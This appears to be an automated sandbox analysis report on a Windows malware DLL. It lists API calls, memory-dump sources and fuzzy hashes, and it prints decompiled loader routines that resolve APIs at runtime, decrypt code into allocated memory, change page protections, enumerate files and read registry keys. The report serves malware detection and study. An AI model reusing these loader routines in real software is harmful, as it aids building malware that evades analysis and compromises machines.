0x00dc878d
0x00dc8796
0x00dc879c
0x00dc87a2
0x00dc87a7
0x00dc87ae
0x00dc87b2
0x00dc87ba
0x00dc87c2
0x00dc87c4
0x00dc87c4
0x00dc87cc
0x00dc87ce
0x00dc87ce
0x00dc87cc
0x00dc87d8
0x00000000
0x00dc87d8
0x00dc873a
0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00DC8729
GetTickCount.KERNEL32 ref: 00DC8740
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00DC8760
SwitchToThread.KERNEL32(?,00000001), ref: 00DC8766
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00DC8782
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00DC879C
IsWow64Process.KERNEL32(0000032C,?,?,00000001), ref: 00DC87BA

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID:
API String ID: 3690864001-0
Opcode ID: 60d08cb12b085b92d16b587e94cd329dd802ed97d4acfadcbc4f2f7c6f8033de
Instruction ID: 742761246130f4f6d3474c43a7d175ce61a88bae87a3f71e7637aafd01c37eb0
Opcode Fuzzy Hash: 60d08cb12b085b92d16b587e94cd329dd802ed97d4acfadcbc4f2f7c6f8033de
Instruction Fuzzy Hash: 2C2193B2500307AFD7109F64DC89F6A77D8EB44355F14492DF659C3290EB30D8049B71

Uniqueness

Uniqueness Score: -1.00%

Function 70290050, Relevance: 9.8, APIs: 2, Strings: 3, Instructions: 1023sleepCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(702C1460,0000079D), ref: 70290535
Sleep.KERNELBASE(0000008F), ref: 70290A35

Strings

;0Vu, xrefs: 70290D77
S, xrefs: 70290520
", xrefs: 70290A10

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: DirectorySleepSystem
String ID: "$;0Vu$S
API String ID: 2556431487-2513040136
Opcode ID: f123149b4f1f7c8843663e0c5d84d76c1fd1050bd107e0ed8cd948a54335bcf6
Instruction ID: 3ba81995f0a4cc5887f8f38c2c0c8d8e663dc06cd335db83b2964d98fa071e2e
Opcode Fuzzy Hash: f123149b4f1f7c8843663e0c5d84d76c1fd1050bd107e0ed8cd948a54335bcf6
Instruction Fuzzy Hash: 29929C73A093968FD304CF3DC9D825EBBE1ABC9300F148A2DE499D3356D2349915EB96

Uniqueness

Uniqueness Score: -1.00%

Function 70251A07, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E70251A07(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E702519C2(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x70254150 + 0x70255014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x70254150 + 0x702550e1);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E702515C4(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x70254150 + 0x702550f1);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x70254150 + 0x70255104);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x70254150 + 0x70255119);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x70254150 + 0x7025512f);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E7025161B(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x70251a16
0x70251a1a
0x70251adc
0x70251a20
0x70251a38
0x70251a47
0x70251a4e
0x70251a52
0x70251a55
0x70251ad4
0x70251ad5
0x70251a57
0x70251a64
0x70251a68
0x70251a6b
0x00000000
0x70251a6d
0x70251a7a
0x70251a7e
0x70251a81
0x00000000
0x70251a83
0x70251a90
0x70251a94
0x70251a97
0x00000000
0x70251a99
0x70251aa6
0x70251aaa
0x70251aad
0x00000000
0x70251aaf
0x70251ab5
0x70251aba
0x70251ac1
0x70251ac8
0x70251acb
0x00000000
0x70251acd
0x70251ad0
0x70251ad0
0x70251acb
0x70251aad
0x70251a97
0x70251a81
0x70251a6b
0x70251a55
0x70251aea

APIs

Part of subcall function 702519C2: HeapAlloc.KERNEL32(00000000,?,7025182D,?,00000000,00000000,?,702511D6), ref: 702519CE

GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,702516ED,?,?,?,00000002,?,?,?), ref: 70251A2C
GetProcAddress.KERNEL32(00000000,?), ref: 70251A4E
GetProcAddress.KERNEL32(00000000,?), ref: 70251A64
GetProcAddress.KERNEL32(00000000,?), ref: 70251A7A
GetProcAddress.KERNEL32(00000000,?), ref: 70251A90
GetProcAddress.KERNEL32(00000000,?), ref: 70251AA6

Part of subcall function 7025161B: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,00000002), ref: 70251678
Part of subcall function 7025161B: memset.NTDLL ref: 7025169A

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 1632424568-0
Opcode ID: d303cacb7cbab5b772f34b0838e870cec0895c523a0ab80999f9d2b7e1bc5994
Instruction ID: 71fb300d3a48136d24ed99ab0f099e34fb4f45e944c6390ce4780c7d67393b07
Opcode Fuzzy Hash: d303cacb7cbab5b772f34b0838e870cec0895c523a0ab80999f9d2b7e1bc5994
Instruction Fuzzy Hash: F7210AB360160A9FD711DF6AC944F9ABBFCEF082447104599E51ACB350E670ED09DF68

Uniqueness

Uniqueness Score: -1.00%

Function 70293EB6, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 70293EF3
dllmain_crt_dispatch.LIBCMT ref: 70293F0A
dllmain_raw.LIBCMT ref: 70293F52
dllmain_crt_dispatch.LIBCMT ref: 70293F65
dllmain_raw.LIBCMT ref: 70293F78

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 5cdbb2e470c18464d0e2fe7583ac86aaf735f166732659efad3fb887306dece8
Instruction ID: f1611e7d66350a0f162d7d6a2cd78dacdef365a9e20ac366e16c115b449eb013
Opcode Fuzzy Hash: 5cdbb2e470c18464d0e2fe7583ac86aaf735f166732659efad3fb887306dece8
Instruction Fuzzy Hash: 2E21A173D2821ABEDB228F14CC41A6F3A79EF84790F104119FC1AB7650D7309D318B98

Uniqueness

Uniqueness Score: -1.00%

Function 70251000, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E70251000(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x70254130;
				_t39 = E70251416(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x7025414c;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x70255137; // 0x70255137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E70251AED(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x7025414c = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

0x70251007
0x70251017
0x7025101e
0x70251021
0x70251036
0x7025103d
0x70251042
0x70251053
0x70251056
0x7025105e
0x70251061
0x7025110b
0x70251067
0x70251067
0x7025106b
0x702510d3
0x7025106d
0x7025106d
0x70251070
0x70251072
0x7025107a
0x7025107d
0x70251080
0x70251088
0x70251090
0x70251091
0x70251092
0x70251099
0x70251099
0x702510ad
0x702510b2
0x702510bb
0x702510c2
0x702510c5
0x702510c9
0x702510ce
0x00000000
0x00000000
0x70251085
0x70251085
0x702510d0
0x702510dd
0x702510f2
0x702510df
0x702510e8
0x702510ed
0x70251103
0x70251103
0x70251112
0x70251118

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 70251056
memcpy.NTDLL(?,702511B2,?,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 702510E8
VirtualFree.KERNELBASE(702511B2,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,702511B2,00000000), ref: 70251103

Strings

Feb 12 2021, xrefs: 70251088

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Feb 12 2021
API String ID: 4010158826-2916597941
Opcode ID: 0af6b82d3ebda98a538b38719348708073690ef3c6a380cef4a9f61fb78d1c5c
Instruction ID: 6a95f46cdf2bbe1f9fa933b1af50bffb58e7af01f00b8eb9677044305b026c6a
Opcode Fuzzy Hash: 0af6b82d3ebda98a538b38719348708073690ef3c6a380cef4a9f61fb78d1c5c
Instruction Fuzzy Hash: AD317272E002199FCB01CF99C881B9EF7B9AF48304F2081A9E905B7384D775AA59CF94

Uniqueness

Uniqueness Score: -1.00%

Function 70251E8A, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E70251E8A() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t24;
				int _t25;
				void* _t29;
				intOrPtr* _t31;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				int _t41;

				 *0x70254148 =  *0x70254148 & 0x00000000;
				_push(0);
				_push(0x70254144);
				_push(1);
				_push( *0x70254150 + 0x70255089);
				 *0x70254140 = 0xc; // executed
				L70251CAC(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E702517C2( &_v44,  &_v28,  *0x7025414c ^ 0xfd7cd1cf) == 0) {
					_t24 = 0xb;
					L7:
					ExitThread(_t24);
				}
				_t25 = lstrlenW( *0x70254138);
				_t7 = _t25 + 2; // 0x2
				_t41 = _t25 + _t7;
				_t10 = _t41 + 8; // 0xa
				_t29 = E70251470(_t37, _t10,  &_v48,  &_v52); // executed
				if(_t29 == 0) {
					_t36 =  *0x70254138;
					_t31 = _v52;
					 *_t31 = 0;
					if(_t36 == 0) {
						 *(_t31 + 4) =  *(_t31 + 4) & 0x00000000;
					} else {
						memcpy(_t31 + 4, _t36, _t41);
					}
				}
				_t24 = E702516C3(_v44, _t37); // executed
				goto L7;
			}

0x70251e95
0x70251ea0
0x70251ea2
0x70251ea7
0x70251eaf
0x70251eb0
0x70251eba
0x70251ec3
0x70251ec8
0x70251ee6
0x70251f45
0x70251f46
0x70251f47
0x70251f47
0x70251eee
0x70251ef4
0x70251ef4
0x70251f02
0x70251f06
0x70251f0d
0x70251f0f
0x70251f17
0x70251f1b
0x70251f21
0x70251f33
0x70251f23
0x70251f29
0x70251f2e
0x70251f21
0x70251f3c
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,70254144,00000000), ref: 70251EBA
lstrlenW.KERNEL32(?,?,?), ref: 70251EEE

Part of subcall function 70251470: GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A,?), ref: 7025147D
Part of subcall function 70251470: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 70251493
Part of subcall function 70251470: _snwprintf.NTDLL ref: 702514B8
Part of subcall function 70251470: CreateFileMappingW.KERNELBASE(000000FF,70254140,00000004,00000000,?,?), ref: 702514DD
Part of subcall function 70251470: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B,0000000A), ref: 702514F4
Part of subcall function 70251470: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,70251F0B), ref: 70251529

memcpy.NTDLL(?,?,00000002,0000000A,?,?), ref: 70251F29
ExitThread.KERNEL32 ref: 70251F47

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlenmemcpy
String ID:
API String ID: 2378523637-0
Opcode ID: f3d64f3f801d33a292605fdcbebf8d3cb2c3b97c59dbb3c92e5d11e93f781ed0
Instruction ID: 118da92a0fe2c05c645e7ef8a25365bafb8652f7fe0600403f3970d475cfe508
Opcode Fuzzy Hash: f3d64f3f801d33a292605fdcbebf8d3cb2c3b97c59dbb3c92e5d11e93f781ed0
Instruction Fuzzy Hash: EB119073614301AFD701CF61CC49F8BB7ECAB44318F204999B505D72A0EBB4E5589B59

Uniqueness

Uniqueness Score: -1.00%

Function 702982BF, Relevance: 4.6, APIs: 3, Instructions: 142COMMON

Download Yara Rule

APIs

Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B

_free.LIBCMT ref: 7029836E
_free.LIBCMT ref: 7029839C
_free.LIBCMT ref: 702983E4

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: b0ce34c5dcee3b7911124a184addfcf517c0455d1f17b1ba5e764711d445753a
Instruction ID: 54a35108bcce7a0aff7a0b001e7b92a3d5c0db6e82a1710657d517c06e755d3a
Opcode Fuzzy Hash: b0ce34c5dcee3b7911124a184addfcf517c0455d1f17b1ba5e764711d445753a
Instruction Fuzzy Hash: BF417E726101069FD715CFACC881A6DB7F9EF49324B2805ADE516E72A1DB31FC209F98

Uniqueness

Uniqueness Score: -1.00%

Function 70298423, Relevance: 4.6, APIs: 3, Instructions: 96COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 7029844F
__cftoe.LIBCMT ref: 70298481
_free.LIBCMT ref: 702984A7

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: 7b0598cff79fc6db5ea274ccbea5fec3ba90d6f1abb7da1e1d8e8871c145494d
Instruction ID: 9e3e6c8109071bdf8002cd50afe26f03da1785a8f52b6f9b36cb91962cd80fa6
Opcode Fuzzy Hash: 7b0598cff79fc6db5ea274ccbea5fec3ba90d6f1abb7da1e1d8e8871c145494d
Instruction Fuzzy Hash: B321E5B781410A7EDF109F95DC01EDE3BBCDF85260F24412BF916F5090EE30DA208A59

Uniqueness

Uniqueness Score: -1.00%

Function 70293CFF, Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 70293D4C

Part of subcall function 70294348: RtlInitializeSListHead.NTDLL(702C0D48), ref: 7029434D

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 70293DB6
___scrt_fastfail.LIBCMT ref: 70293E00

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 7e05a9bd5963a2b877d26c993b409b1994d7042af6d1d2263cfd8a7b899084c6
Instruction ID: 9c3b4f53563ac562f7092b7e2d1c365991116c05acb2038bba71e29875f6c049
Opcode Fuzzy Hash: 7e05a9bd5963a2b877d26c993b409b1994d7042af6d1d2263cfd8a7b899084c6
Instruction Fuzzy Hash: 172105776682069EDB10AFB48816B9D3BB59F02329F200659EC877B1C1CF612530CA7D

Uniqueness

Uniqueness Score: -1.00%

Function 70251F74, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E70251F74(void* __eax, long __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				long _v16;
				signed int _v20;
				int _t33;
				signed int _t36;
				long _t41;
				void* _t50;
				void* _t51;
				signed int _t54;

				_t41 = __edx;
				_v12 = _v12 & 0x00000000;
				_t36 =  *(__eax + 6) & 0x0000ffff;
				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v20 = _t36;
				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
				_v8 = _v8 & 0x00000000;
				if(_t36 <= 0) {
					L11:
					return _v12;
				}
				_t51 = _t50 + 0x24;
				while(1) {
					_t54 = _v12;
					if(_t54 != 0) {
						goto L11;
					}
					asm("bt dword [esi], 0x1d");
					if(_t54 >= 0) {
						asm("bt dword [esi], 0x1e");
						if(__eflags >= 0) {
							_t41 = 4;
						} else {
							asm("bt dword [esi], 0x1f");
							asm("sbb edx, edx");
							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
						}
					} else {
						asm("bt dword [esi], 0x1f");
						asm("sbb edx, edx");
						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
					}
					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
					if(_t33 == 0) {
						_v12 = GetLastError();
					}
					_t51 = _t51 + 0x28;
					_v8 = _v8 + 1;
					if(_v8 < _v20) {
						continue;
					} else {
						goto L11;
					}
				}
				goto L11;
			}

0x70251f74
0x70251f7e
0x70251f83
0x70251f8f
0x70251f9c
0x70251fa2
0x70251fa4
0x70251faa
0x70252016
0x7025201d
0x7025201d
0x70251fac
0x70251faf
0x70251faf
0x70251fb3
0x00000000
0x00000000
0x70251fb5
0x70251fb9
0x70251fce
0x70251fd2
0x70251fe8
0x70251fd4
0x70251fd4
0x70251fdd
0x70251fe3
0x70251fe3
0x70251fbb
0x70251fbb
0x70251fc4
0x70251fc9
0x70251fc9
0x70251ff9
0x70251ffd
0x70252005
0x70252005
0x70252008
0x7025200b
0x70252014
0x00000000
0x00000000
0x00000000
0x00000000
0x70252014
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 70251FA2
VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 70251FF9
GetLastError.KERNEL32(?,?), ref: 70251FFF

Memory Dump Source

Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true

Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 363e2658eb37bce25f984c1b35f73e48921b6e95d2716b33bb19488e7bfd83dd
Instruction ID: 7b71d73e86d3a9611a83c59908d7d74cc422e26fa40ef5e6b32d43c3844109e1
Opcode Fuzzy Hash: 363e2658eb37bce25f984c1b35f73e48921b6e95d2716b33bb19488e7bfd83dd
Instruction Fuzzy Hash: B0210273A00209EFDB108F88CC80FADF7FAFB84314F208188E50056241D3349A8DDB54

Uniqueness

Uniqueness Score: -1.00%

Function 00DC5311, Relevance: 4.6, APIs: 3, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00DC5311(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0xdcd2e0;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E00DC3512(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E00DC745D(_t19);
					if(_t20 == 0) {
						HeapFree( *0xdcd1f0, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0xdcd2e8; // 0x5119bf0
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x00dc5318
0x00dc531f
0x00dc5322
0x00dc5329
0x00dc532e
0x00dc5330
0x00dc5337
0x00dc533e
0x00000000
0x00000000
0x00dc5340
0x00dc5345
0x00dc5346
0x00dc534d
0x00dc5367
0x00000000
0x00dc534f
0x00dc534f
0x00dc5351
0x00dc5354
0x00dc5358
0x00000000
0x00000000
0x00dc535a
0x00dc5358
0x00dc5371
0x00dc5373
0x00dc5379
0x00dc537b
0x00dc5381
0x00dc5388
0x00dc5398
0x00dc5390
0x00dc5393
0x00dc5393
0x00dc539b
0x00dc539b
0x00dc53a5
0x00dc53a5
0x00dc536d
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DC532E

Part of subcall function 00DC3512: RtlAllocateHeap.NTDLL(00000000,63699BC3,00DCD2E0), ref: 00DC353D
Part of subcall function 00DC3512: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00DC355F
Part of subcall function 00DC3512: memset.NTDLL ref: 00DC3579
Part of subcall function 00DC3512: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00DC35B7
Part of subcall function 00DC3512: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00DC35CB
Part of subcall function 00DC3512: CloseHandle.KERNEL32(?), ref: 00DC35E2
Part of subcall function 00DC3512: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00DC35EE
Part of subcall function 00DC3512: lstrcat.KERNEL32(?,642E2A5C), ref: 00DC362F
Part of subcall function 00DC3512: FindFirstFileA.KERNELBASE(?,?), ref: 00DC3645

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DC5373

Part of subcall function 00DC745D: lstrlen.KERNEL32(?,00DCD2E0,74B47FC0,00000000,00DC534B,?,?,?,?,?,00DC70B5,?), ref: 00DC7466
Part of subcall function 00DC745D: mbstowcs.NTDLL ref: 00DC748D
Part of subcall function 00DC745D: memset.NTDLL ref: 00DC749F

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00DC70B5,?), ref: 00DC5367

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: Wow64$FileHeap$AllocateEnableRedirectionmemset$CloseCreateFindFirstFreeHandleTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 94831996-0
Opcode ID: b19132ca9190e7cc1d50cac23ec6741edc05fb877255465e9b31cbafcdd69ddc
Instruction ID: dc89762a7e5d19a1fc48eaf12b41a4f3d5ff27e3ecbfb169e7b6dc2942e776d6
Opcode Fuzzy Hash: b19132ca9190e7cc1d50cac23ec6741edc05fb877255465e9b31cbafcdd69ddc
Instruction Fuzzy Hash: BE110875510347EEDB008B95EC44FACB7A5FB41394F14002AE541D7194C2B5AD82AB74

Uniqueness

Uniqueness Score: -1.00%

Function 00DC76D6, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DC76D6(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0xdcd230; // 0x434a5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0xdcea60; // 0x4f0053
				_v16 = 4;
				_t31 = E00DC7404(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0xdcd230; // 0x434a5a8
					_t5 = _t19 + 0xdceabc; // 0x6e0049
					_t34 = E00DC7404(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E00DC4C31(_t34);
					}
					E00DC4C31(_t31);
				}
				return _v8;
			}

0x00dc76dc
0x00dc76e1
0x00dc76e6
0x00dc76ed
0x00dc76f9
0x00dc76fd
0x00dc76ff
0x00dc7705
0x00dc7711
0x00dc7715
0x00dc7728
0x00dc7730
0x00dc7744
0x00dc774c
0x00dc774e
0x00dc774e
0x00dc7755
0x00dc7755
0x00dc775c
0x00dc775c
0x00dc7762
0x00dc7767
0x00dc776d

APIs

Part of subcall function 00DC7404: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00DC76F9,004F0053,00000000,?), ref: 00DC740D
